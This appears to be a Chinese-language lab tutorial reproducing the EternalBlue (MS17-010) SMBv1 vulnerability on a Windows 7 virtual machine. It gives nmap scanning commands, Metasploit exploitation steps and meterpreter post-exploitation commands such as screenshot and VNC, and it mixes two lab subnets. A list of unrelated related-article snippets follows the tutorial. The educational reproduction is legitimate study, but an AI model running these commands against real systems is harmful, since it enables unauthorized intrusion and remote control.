漏洞复现_永恒之蓝

1.概述

永恒之蓝(EternalBlue)是一个影响Windows操作系统的远程代码执行漏洞,编号为CVE-2017-0144,最初由美国国家安全局(NSA)开发并利用,后来被黑客组织Shadow Brokers泄露。该漏洞存在于SMBv1协议的内存处理过程中,攻击者可通过发送特制的恶意数据包远程执行任意代码,控制目标系统。它最臭名昭著的应用是2017年的WannaCry勒索软件攻击,该攻击迅速传播,影响超过230,000台计算机,导致全球范围内的广泛破坏。微软在2017年3月发布了安全更新补丁(MS17-010)修复该漏洞,但由于部分系统未及时更新,仍有大量机器暴露在风险之中。为防范此类攻击,建议关闭SMBv1协议并及时应用补丁。本文在虚拟环境中,使用Nmap和Metasploit对病毒攻击进行复现,展示其攻击过程,供大家学习和参考。

如果当前的Windows系统启用了SMBv1协议并且没有安装微软发布的补丁MS17-010,那么该系统确实暴露在永恒之蓝(EternalBlue)漏洞的威胁之下。

2. 复现准备

2.1 漏洞原理

永恒之蓝的漏洞存在于SMBv1协议的实现中。当一个Windows系统通过SMBv1接收到经过特制的恶意请求时,协议处理过程中的缓冲区管理出现错误,导致内存中的数据被非法操作。这种内存管理漏洞属于缓冲区溢出(Buffer Overflow)类型,使得攻击者可以向目标系统注入并执行任意代码,最终完全控制受害者系统。其详细过程如下:

  • 缓冲区溢出:攻击者向目标系统的SMBv1服务发送一个特制的请求数据包,该数据包利用了SMB协议在处理网络请求时的内存管理缺陷。在处理这些数据时,系统没有正确验证输入的大小,导致了缓冲区溢出问题。
  • 内存损坏:缓冲区溢出会使得攻击者能够覆盖系统内存中的数据,尤其是代码执行区域的内存。通过精心构造的攻击数据包,攻击者能够覆盖特定的内存区域,使得系统执行恶意代码。
  • 远程代码执行:攻击者可以在目标系统上植入恶意代码并远程执行。因为SMB服务通常运行在系统权限下,攻击者获得的执行权限往往是管理员权限,这意味着攻击者可以完全控制受害系统。

缓冲区溢出(Buffer Overflow)是一种常见的计算机安全漏洞,发生在程序试图将超过预定大小的数据写入缓冲区时。缓冲区是程序在内存中用于临时存储数据的区域,当数据超出该区域容量时,多余的数据会覆盖相邻的内存地址,可能导致程序崩溃或给攻击者提供执行任意代码的机会。

2.2 漏洞影响

永恒之蓝漏洞影响了多个Windows版本,其中Windows 7和Windows Server 2008受到的影响最为严重,许多未打补丁的系统成为攻击目标。Windows Vista和Windows XP也存在风险,前者在2017年结束支持,后者在2014年已不再获得安全更新,使用这些版本的系统极为脆弱。Windows Server 2012虽然受到影响,但通常会及时进行安全更新,而Windows 10在漏洞首次出现时也受影响,但迅速推出了补丁,风险相对较低。Windows Server 2016和2019虽受影响,但仍在持续支持中,建议用户定期更新以降低安全风险。

Windows版本影响程度支持状态
Windows 7受影响严重,许多未打补丁的系统成为攻击目标2020年1月结束支持,某些企业仍在使用
Windows Server 2008同样受到影响,广泛应用于企业和数据中心环境2020年1月结束主流支持,转入扩展支持
Windows Vista受到影响,但用户数量较少2017年4月结束支持
Windows XP历史悠久的系统,易受到攻击,特别是在特定设备上2014年结束支持,使用该版本的系统风险极高
Windows Server 2012受影响,但通常会较快进行安全更新仍在进行主流支持,未打补丁的系统存在风险
Windows 10受影响但快速发布了补丁,相对风险较低持续获得更新和支持,建议定期安装安全补丁
Windows Server 2016受影响但及时获得安全补丁仍在持续支持中,建议定期更新
Windows Server 2019受影响但及时获得安全补丁仍在持续支持中,建议定期更新

2.3 复现环境

虚拟环境搭建:VMware Workstation 17 Pro

网络模式:NAT是一种在网络设备(如路由器或防火墙)中使用的技术,用于将私有IP地址转换为公共IP地址。通过NAT,多个虚拟机可以共享宿主机的公共IP地址,以访问外部网络。

当虚拟机发送网络请求时,宿主机会捕获这些请求,并将虚拟机的私有IP地址转换为宿主机的公共IP地址,然后将请求发送到外部网络。当外部网络返回数据时,宿主机会使用NAT表将数据包路由回相应的虚拟机,每个虚拟机的流量通过不同的端口进行标识,从而确保数据包能够正确发送到目标虚拟机。

攻击机:kali Linux 2019.1,IP:192.168.153.130。

靶机:Windows 7,IP:192.168.153.129。

3. 攻击复现

3.1 使用nmap进行扫描

使用nmap扫描当前网段中存活的主机

# 活跃机器扫描
nmap -sS 192.168.153.0/24

扫描发现与攻击机处于同一网段的靶机,其IP为192.168.153.129,其开放的端口包括135端口、139端口基于445端口。在此基础上,需要进一步确认靶机的操作系统类型。

# 操作系统侦察
nmap -O 192.168.56.129

扫描发现靶机的操作系统为Windows 7,在此基础上进一步通过nmap脚本扫描靶机中存在的漏洞。

# 漏洞扫描
nmap --script=vuln 192.168.56.132

扫描发现靶机存在永恒之蓝漏洞(ms17-010),接下来需要使用工具实现漏洞的利用。

3.2 使用Metasploit进行攻击

启动Metasploit,并搜索永恒之蓝漏洞相关的工具。

# 启动metasploit
msfconsole# 搜索永恒之蓝相关工具
search ms17-010

执行上述指令后发现,存在一系列用于永恒之蓝漏洞利用的模块,如上图所示。其中,我们利用模块2。

# 选择模块2
use 2# 显示配置
show option# 设置靶机IP
set RHOSTS 192.168.153.129# 运行模块
run

运行成功后会出现 `meterpreter >` 提示符,它是 Metasploit 的一个强大扩展模块。通过 Meterpreter,可以执行更深入的渗透操作,例如获取目标系统的屏幕截图、上传或下载文件、创建持久后门等。基于meterpreter模块,我们首先可以实现靶机的截屏,如下图所示。

# 靶机截屏指令
screenshot# 远程桌面指令
run vnc

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.xdnf.cn/news/1541394.html

如若内容造成侵权/违法违规/事实不符,请联系一条长河网进行投诉反馈,一经查实,立即删除!

相关文章

自注意力(self_attention)和位置编码

目录 1.自注意力(self_attention)公式 2.代码实现 2.1位置编码的代码实现 3.知识点个人理解 1.自注意力(self_attention)公式 2.代码实现 import math import torch from torch import nn import dltoolsnum_hiddens, num_he…

assign是赋值,不是连接

如下图是一个top文件的背压 如果把原本应该是外界输入的变量m_ip_hdr_ready通过phv_parser_hdr_ready来“赋值!!!”,那么模块内部本该有的ready信号,就会是Z高阻态,因为没有给到值。 正确的赋值 将整个模…

GEE教程:利用sentinel-2数据进行ndwi和ndci指数的计算和下载

目录 简介 函数 normalizedDifference(bandNames) Arguments: Returns: Image Export.image.toDrive(image, description, folder, fileNamePrefix, dimensions, region, scale, crs, crsTransform, maxPixels, shardSize, fileDimensions, skipEmptyTiles, fileFormat, …

2024年双十一不容错过的好物分享,最值得买的几款超值单品

2024的“双11”购物狂欢节即将要拉开帷幕,大家有没有物色到心仪的好物呢?平时看中的某一件商品,总想着在最低价时入手,毫无疑问双十一就是最佳时机,毕竟各大电商平台都会推出优惠活动。为此我也特意整理了一份数码好物…

【YOLO目标检测学生课堂行为数据集】共4266张、已标注txt格式、有训练好的yolov5的模型

目录 说明图片示例 说明 数据集格式:YOLO格式 图片数量:4266 标注数量(txt文件个数):4266 标注类别数:3 标注类别名称:hand、read、write 数据集下载:学生课堂行为数据集 图片示例 数据集图片&#…

耳夹式耳机值得买吗?揭秘耳夹式耳机六大避坑指南!

耳夹式耳机值得买吗?这是很多人的疑问,但是夹耳式耳机火起来跟当下人们对健康运动的需求密不可分,入耳式耳机照顾了听音需求就很难兼顾环境音,还有耳部健康和佩戴舒适度等等,而运动时半入耳式耳机又容易掉,…

2024年华为杯研赛(D题)数学建模竞赛解题思路|完整代码论文集合

我是Tina表姐,毕业于中国人民大学,对数学建模的热爱让我在这一领域深耕多年。我的建模思路已经帮助了百余位学习者和参赛者在数学建模的道路上取得了显著的进步和成就。现在,我将这份宝贵的经验和知识凝练成一份全面的解题思路与代码论文集合…

详解c++:new和delete

文章目录 前言一、new和mallocnew的用法(爽点)自动构造 delete和freedelete的用法(爽点) 提醒 前言 提示:这里可以添加本文要记录的大概内容: 在C中,new 和 delete 是两个非常重要的操作符&am…

0921VGG网络实现

深度学习之VGG网络搭建 1.VGG动机2.VGG架构3.代码4.结论1.VGG动机 随着卷积网络在计算机视觉领域的快速发展,越来越多的研究人员开始通过改变模型的网络结构在提高在图像识别任务中的精度,例如使用更小的卷积核和步长[2]。基于类似的想法,论文作者提出可以尝试通过改变卷积…

FLUX.1+ComfyUI部署与使用:图像合成技术的新高度

✨ Blog’s 主页: 白乐天_ξ( ✿>◡❛) 🌈 个人Motto:他强任他强,清风拂山冈! 💫 欢迎来到我的学习笔记! FLUX.1的版本 FLUX.1是由黑森林实验室([Black Forest Labs](https://bla…

进程分析工具Process Explorer使用

进程分析工具Process Explorer使用 Process Explorer让使用者能了解看不到的在后台执行的处理程序,能显示目前已经载入哪些模块,分别是正在被哪些程序使用着,还可显示这些程序所调用的DLL进程,以及他们所打开的句柄。Process Expl…

ORCDA仿真功能_PS_PISC,显示窗口小,模板工程,光标,查看值

1 开启PS_PICE仿真功能 1 新建 2 可以选择已有模板工程 3 创建模板工程 2 进行仿真 1 设置仿真时间 2 可以用光标测量不同曲线位置的信息(如电压) 1 光标,可以测量不同点的电压 2 Trace(测量功率),加…

探索《越南语翻译通》App:高效语言学习的利器

在当今这个全球化的世界里,语言学习变得越来越重要。随着科技的发展,我们有了更多便捷的工具来帮助我们学习新的语言。今天,我们来探索一款名为《越南语翻译通》的App,它正逐渐成为语言学习者的新宠。 《越南语翻译通》App的特点…

VMware虚拟机密码忘记了怎么办

1.首先,启动系统,进入开机界面,在界面中按“e”进入编辑界面 2.进入编辑界面,使用键盘上的上下键把光标往下移动,找到以““Linux16”开头内容所在的行数”,在行的最后面输入(最好把前面的语言改…

Fabric:布匹纺织缺陷检测数据集(猫脸码客 第195期)

布匹数据集在纺织工业中的应用与探索:从布匹检索到纹理检测 引言 在快速发展的纺织工业中,信息技术的深度融合正逐步推动产业向智能化、精细化转型。其中,布匹数据集作为连接传统制造与数字技术的桥梁,其在布匹检索、纹理检测等…

CVE-2024-46101

前言 自己挖的第一个CVE~ 喜提critical 这里简单说一下。 漏洞简介 GDidees CMS < 3.9.1 的版本&#xff0c;存在一个任意文件上传漏洞。允许登录后的攻击者上传webshell获得网站的权限。 影响版本&#xff1a; GDidees CMS < 3.9.1 &#xff08;其它的我没测。。&am…

Python入门:数据类型、控制流与函数详解

如果你正在学习Python&#xff0c;那么你需要的话可以&#xff0c;点击这里&#x1f449;Python重磅福利&#xff1a;入门&进阶全套学习资料、电子书、软件包、项目源码等等免费分享&#xff01; Python作为一种广泛使用的高级编程语言&#xff0c;以其简洁的语法、丰富的库…

进程间的通信3-信号量

信号量 1.资源竞争 资源竞争 : 当多个进程同时访问共享资源时&#xff0c;会产生资源竞争&#xff0c;最终最导致数据混乱临界资源 : 不允许同时有多个进程访问的资源&#xff0c;包括硬件资源(CPU、内存、存储器以及其他外围设备)与软件资源(共享代码段、共享数据结构)临界区…

【项目管理进阶】风险问题

前言 各位盆友&#xff0c;你们期待的项目管理进阶系列有新的消息&#xff0c;请注意查收&#xff0c;并反馈哦~ 在参加项目的过程中&#xff0c;你是否面临或参加过类似如下的场面&#xff1a; 为了立项&#xff0c;先调研市场、技术、社会、组织内部的现状为了科学的管理项目…

2024年中国研究生数学建模竞赛C题数据驱动下磁性元件的磁芯损耗建模 思路讲解

第一题是非常经典的机器学习分类过程, 首先第一步,我们需要做可视化分析。通过一些统计学方法来分析磁通密度的分布特征以及不同波形的一个形态特征,那这里可以通过绘制一些例如核密度估计图,双变量影响关系图,描述性统计等等, 其次,第二步,我们需要去构建特征筛选。…